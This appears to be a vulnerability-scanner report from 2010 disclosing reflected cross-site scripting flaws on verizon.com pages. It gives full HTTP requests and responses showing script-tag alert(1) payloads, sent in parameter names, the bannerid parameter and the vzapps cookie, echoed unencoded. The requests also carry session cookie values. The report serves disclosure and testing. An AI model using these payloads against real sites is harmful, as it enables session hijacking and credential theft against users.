Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the 3828e"><script>alert(1)</script>450552b46bf request parameter is copied into the HTML document as plain text between tags. The payload 30dd7<script>alert(1)</script>5e4c65629c4 was submitted in the 3828e"><script>alert(1)</script>450552b46bf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 194d1<script>alert(1)</script>6bba43a7f86 was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 MyVzServer: GWA25V Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Expires: Sat, 20 Nov 2010 00:55:10 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:55:10 GMT Connection: close Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:00:10 GMT; path=/foryourhome/registration/; domain=verizon.com Content-Length: 47430
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Verizon | Sign In</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta ...[SNIP]... </script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86" name="target"> ...[SNIP]...
1.3. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www22.verizon.com
Path:
/ForyourHome/Registration/Reg/OrLogin.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3828e"><script>alert(1)</script>450552b46bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 MyVzServer: 03A02V Content-Type: text/html; charset=utf-8 Content-Length: 47344 Expires: Sat, 20 Nov 2010 00:16:50 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:16:50 GMT Connection: close Set-Cookie: RegistrationApp=SessionId=8258b46e-23bd-41ac-b0a6-3b65ca36843c; domain=.verizon.com; path=/ Set-Cookie: VZGEO=west; domain=.verizon.com; path=/ Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6bf45525d5f4f58455e445a4a423660;path=/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Verizon | Sign In</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta ...[SNIP]... <INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&3828e"><script>alert(1)</script>450552b46bf=1" name="target"> ...[SNIP]...
The value of the bannerid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55d47"%3b6993170f2f3 was submitted in the bannerid parameter. This input was echoed as 55d47";6993170f2f3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Residential/HighSpeedInternet/CheckAvailability/CheckAvailability.htm?bannerid=BannerDry1m55d47"%3b6993170f2f3 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 64661 Expires: Sat, 20 Nov 2010 00:09:51 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:51 GMT Connection: close Set-Cookie: ContextInfo_State=TX; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | High Speed Internet | Check Availability </title><meta name="keywords" content="how to get verizon high speed internet, order verizon high ...[SNIP]... <script language ="javascript">
// for check Availabiltity var BannerID = "BannerDry1m55d47";6993170f2f3"; var xmlSource = "<PROMOBANNERS> ...[SNIP]...
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ab670<script>alert(1)</script>34458ec6bd8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXab670<script>alert(1)</script>34458ec6bd8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68152 Expires: Sat, 20 Nov 2010 00:18:41 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:18:41 GMT Connection: close Set-Cookie: ContextInfo_State=TXab670<script>alert(1)</script>34458ec6bd8; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cddfb'><script>alert(1)</script>30cb0779e1a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Content/CommonTemplates/Templates/HighSpeedInternet/HSIvsCable.aspx?NRMODE=Published&NRNODEGUID=%7bAB8BA7AD-DEF3-46C6-A604-9A615595AE37%7d&NRORIGINALURL=%2fResidential%2fHighSpeedInternet%2fHSIvsCable%2fHSIvsCable%2ehtm%3fCMP%3dBAC-MXT_D_P2_CS_Z_Q_N_Z330&NRCACHEHINT=ModifyGuest&CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330 HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXcddfb'><script>alert(1)</script>30cb0779e1a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 68156 Expires: Sat, 20 Nov 2010 00:18:40 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:18:40 GMT Connection: close Set-Cookie: ContextInfo_State=TXcddfb'><script>alert(1)</script>30cb0779e1a; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b421a'><script>alert(1)</script>297c29e43fb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXb421a'><script>alert(1)</script>297c29e43fb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload e00e8<script>alert(1)</script>275bd796ccd was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/Bundles/Landing/hsi_offline_pp/hsi_offline_pp.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe00e8<script>alert(1)</script>275bd796ccd; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 50cb2'><script>alert(1)</script>84521e8362 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/ HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX50cb2'><script>alert(1)</script>84521e8362; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63787 Expires: Sat, 20 Nov 2010 00:11:30 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:30 GMT Connection: close Set-Cookie: ContextInfo_State=TX50cb2'><script>alert(1)</script>84521e8362; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7f4a'><script>alert(1)</script>12ba1c0fab5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/ChannelsEnglish/ChannelsEnglish.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 179664 Expires: Sat, 20 Nov 2010 00:12:33 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:33 GMT Connection: close Set-Cookie: ContextInfo_State=TXe7f4a'><script>alert(1)</script>12ba1c0fab5; path=/
<html xmlns:vz> <head id="_ctl0_head"><title> Verizon | DirecTV | Channels </title><meta name="keywords" content="direct tv channels, hd tv channels, hd channels, tv channels, dvr channels, dire ...[SNIP]... <input type='hidden' id='locationInfo' value='TXE7F4A'><SCRIPT>ALERT(1)</SCRIPT>12BA1C0FAB5 ' /> ...[SNIP]...
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4eb83'><script>alert(1)</script>d3ff6108a2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Equipment/Equipment.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX4eb83'><script>alert(1)</script>d3ff6108a2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71665 Expires: Sat, 20 Nov 2010 00:11:45 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:11:45 GMT Connection: close Set-Cookie: ContextInfo_State=TX4eb83'><script>alert(1)</script>d3ff6108a2c; path=/ Set-Cookie: ContextInfo_Equipment=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9a607'><script>alert(1)</script>d0ccb927d19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX9a607'><script>alert(1)</script>d0ccb927d19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 50560 Expires: Sat, 20 Nov 2010 00:09:11 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:11 GMT Connection: close Set-Cookie: ContextInfo_State=TX9a607'><script>alert(1)</script>d0ccb927d19; path=/
The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 7ac79<script>alert(1)</script>c047a0243fc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Installation/Installation.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX7ac79<script>alert(1)</script>c047a0243fc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 50556 Expires: Sat, 20 Nov 2010 00:09:26 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:09:26 GMT Connection: close Set-Cookie: ContextInfo_State=TX7ac79<script>alert(1)</script>c047a0243fc; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 474e8'><script>alert(1)</script>6198f299341 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Packages/Packages.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX474e8'><script>alert(1)</script>6198f299341; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 65391 Expires: Sat, 20 Nov 2010 00:12:53 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:12:53 GMT Connection: close Set-Cookie: ContextInfo_State=TX474e8'><script>alert(1)</script>6198f299341; path=/ Set-Cookie: ContextInfo_Language=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64704'><script>alert(1)</script>60e1cc3bb19 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /Residential/DirecTV/Premium/Premium.htm HTTP/1.1 Host: www22.verizon.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Source=CHSI; vzapps=STATE=TX64704'><script>alert(1)</script>60e1cc3bb19; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;
Response
HTTP/1.0 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 84381 Expires: Sat, 20 Nov 2010 00:10:02 GMT Cache-Control: max-age=0, no-cache, no-store Date: Sat, 20 Nov 2010 00:10:02 GMT Connection: close Set-Cookie: ContextInfo_State=TX64704'><script>alert(1)</script>60e1cc3bb19; path=/ Set-Cookie: ContextInfo_DTVPremium=; path=/
The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ecc81'><script>alert(1)</script>633e3a55ed6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.
